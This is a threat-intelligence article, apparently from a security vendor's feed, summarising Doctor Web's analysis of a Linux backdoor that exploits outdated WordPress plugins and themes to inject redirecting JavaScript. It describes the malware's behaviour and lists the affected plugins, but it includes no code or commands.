Linux backdoor malware infects WordPress-based websites

Linux backdoor malware infects WordPress-based websites

Doctor Web has discovered a malicious Linux program that hacks websites based on a WordPress CMS. It exploits 30 vulnerabilities in a number of plugins and themes for this platform. If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted webpages are injected with malicious JavaScripts. As a result, when users click on any area of an attacked page, they are redirected to other sites.

For many years cybercriminals have been attacking WordPress-driven websites. Information security experts register cases when various vulnerabilities of the WordPress platform are used in order to hack sites and inject malicious scripts into them. An analysis of an uncovered trojan application, performed by Doctor Webs’ specialists, revealed that it could be the malicious tool that cybercriminals have been using for more than three years to carry out such attacks and monetize the resale of traffic, or arbitrage.

Dubbed Linux.BackDoor.WordPressExploit.1 in accordance with Dr.Web anti-virus classification, this malware targets 32-bit versions of Linux, but it can also run on 64-bit versions. Linux.BackDoor.WordPressExploit.1 is a backdoor that is remotely controlled by malicious actors. Upon their command, it is able to perform the following actions:

Attack a specified webpage (website);
Switch to standby mode;
Shut itself down;
Pause logging its actions.
The main functionality of the trojan is to hack websites based on a WordPress CMS (Content Management System) and inject a malicious script into their webpages. To do so, it uses known vulnerabilities in WordPress plugins and website themes. Before attacking, the trojan contacts its C&C server and receives the address of the site it is to infect. Next, Linux.BackDoor.WordPressExploit.1 successively tries exploiting vulnerabilities in the following outdated plugins and themes that can be installed on a website:

WP Live Chat Support Plugin
WordPress – Yuzo Related Posts
Yellow Pencil Visual Theme Customizer Plugin
Easysmtp
WP GDPR Compliance Plugin
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
Thim Core
Google Code Inserter
Total Donations Plugin
Post Custom Templates Lite
WP Quick Booking Manager
Faceboor Live Chat by Zotabox
Blog Designer WordPress Plugin
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
WP-Matomo Integration (WP-Piwik)
WordPress ND Shortcodes For Visual Composer
WP Live Chat
Coming Soon Page and Maintenance Mode
Hybrid
If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server. With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first-regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to.

The trojan application collects statistics on its work. It tracks the overall number of websites attacked, every case of a vulnerability being exploited successfully, and additionally-the number of times it has successfully exploited the WordPress Ultimate FAQ plugin and the Facebook messenger from Zotabox. In addition, it informs the remote server about all detected unpatched vulnerabilities.

Along with the current modification of this trojan application, our specialists also discovered its updated version Linux.BackDoor.WordPressExploit.2. It differs from the original one by the C&C server address, the address of the domain from which the malicious JavaScript is downloaded, and also by an additional list of exploited vulnerabilities for the following plugins:

Brizy WordPress Plugin
FV Flowplayer Video Player
WooCommerce
WordPress Coming Soon Page
WordPress theme OneTone
Simple Fields WordPress Plugin
WordPress Delucks SEO plugin
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher
Rich Reviews plugin
With that, both trojan variants have been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack-by applying known logins and passwords, using special vocabularies. It is possible that this functionality was present in earlier modifications, or, conversely, that attackers plan to use it for future versions of this malware. If such an option is implemented in newer versions of the backdoor, cybercriminals will even be able to successfully attack some of those websites that use current plugin versions with patched vulnerabilities.

Sign Up For Threat Alerts

Loading...
Threats Icon

Feb 05, 2023

Trigona Ransomware Analysis

Trigona ransomware appeared on the threat landscape in late 2022 and threatens to release stolen...

Threats Icon

Feb 02, 2023

Ukraine CERT-UA: Compromised Email Address Used To...

An adversary was discovered using a compromised e-mail address to send phishing emails with a...

Threats Icon

Feb 01, 2023

Ukraine Government Sector Targeted With The DolphinCape...

The government sector of Ukraine was targeted with spear-phishing emails with a malicious attachment which...

Threats Icon

Feb 01, 2023

Ukraine Government Sector Targeted With The DolphinCape...

The government sector of Ukraine was targeted with spear-phishing emails with a malicious attachment which...

Threats Icon

Jan 31, 2023

Multiple Malware Variants Distributed Through Microsoft OneNote

Spear-phishing emails with malicious Microsoft OneNote attachments were discovered delivering variants from the AsyncRAT, Formbook¸...

Threats Icon

Jan 30, 2023

Playing Whack-a-Mole With New Dharma Ransomware Variants

The Dharma ransomware family was initially identified in 2016 and operates as a Ransomware-as-a-Service (RaaS)...

Threats Icon

Jan 29, 2023

APT15 Targets Multiple Sectors With Turian Backdoor

APT15, also known as Playful Taurus, is an advanced persistent threat (APT) that conducts a...

Threats Icon

Jan 26, 2023

Vice Society Ransomware Group Targets Manufacturing Companies

The Vice Society threat group was discovered targeting multiple sectors including manufacturing companies in Brazil....

Threats Icon

Jan 26, 2023

US Cert Alert – Alert (AA23-025A) Protecting...

Although this campaign appears financially motivated, the authoring organizations assess it could lead to additional...

Threats Icon

Jan 25, 2023

Emotet Malware Makes a Comeback with New...

The Emotet malware operation has continued to refine its tactics in an effort to fly...

Threats Icon

Jan 25, 2023

DragonSpark

The DragonSpark attacks represent the first concrete malicious activity where Analysts observe the consistent use...

Threats Icon

Jan 25, 2023

PLAY Ransomware

PLAY is simple but heavily obfuscated with a lot of unique tricks that have not...

Threats Icon

Jan 24, 2023

Gamaredon Abuses Telegram To Target Ukrainian Government...

The Gamaredon APT group was discovered targeting Ukrainian government entities using the Telegram messaging service...

Threats Icon

Jan 23, 2023

NeedleDropper: A New Dropper-as-a-Service Uncovered

Avast's Threat Research Team has since October 2022 been observing a new strain of dropper...

Threats Icon

Jan 22, 2023

Aurora Stealer Leverages Shapeshifting Tactics And Popular...

A threat actor was discovered mimicking legitimate websites to host and deliver the 9002 RAT,...